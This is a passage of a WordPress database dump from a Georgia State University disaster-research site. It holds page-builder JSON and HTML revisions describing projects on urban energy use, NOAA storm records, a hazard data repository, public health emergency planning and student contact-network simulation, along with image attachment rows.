2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:29:30','2023-09-29 14:29:30','',438,'https://gsudice.dataconn.net/?p=1442',0,'revision','',0),(1443,1,'2023-09-29 10:29:30','2023-09-29 14:29:30','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:29:30','2023-09-29 14:29:30','',126,'https://gsudice.dataconn.net/?p=1443',0,'revision','',0),(1448,1,'2023-09-29 10:32:17','2023-09-29 14:32:17','','tornado1','','inherit','open','closed','','tornado1','','','2023-09-29 10:32:17','2023-09-29 14:32:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/tornado1.png',0,'attachment','image/png',0),(1449,1,'2023-09-29 10:32:35','2023-09-29 14:32:35','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado1.png','cropped-tornado1.png','','inherit','open','closed','','cropped-tornado1-png','','','2023-09-29 10:32:35','2023-09-29 14:32:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado1.png',0,'attachment','image/png',0),(1451,1,'2023-09-29 10:34:02','2023-09-29 14:34:02','','tornado','','inherit','open','closed','','tornado','','','2023-09-29 10:34:02','2023-09-29 14:34:02','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/tornado.jpg',0,'attachment','image/jpeg',0),(1452,1,'2023-09-29 10:34:19','2023-09-29 14:34:19','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado.jpg','cropped-tornado.jpg','','inherit','open','closed','','cropped-tornado-jpg','','','2023-09-29 10:34:19','2023-09-29 14:34:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado.jpg',0,'attachment','image/jpeg',0),(1453,1,'2023-09-29 10:35:17','2023-09-29 14:35:17','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-1.jpg','cropped-tornado-1.jpg','','inherit','open','closed','','cropped-tornado-1-jpg','','','2023-09-29 10:35:17','2023-09-29 14:35:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-1.jpg',0,'attachment','image/jpeg',0),(1454,1,'2023-09-29 10:35:40','2023-09-29 14:35:40','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:35:40','2023-09-29 14:35:40','',438,'https://gsudice.dataconn.net/?p=1454',0,'revision','',0),(1455,1,'2023-09-29 10:35:40','2023-09-29 14:35:40','<div data-colibri-id=\"126-c1\" 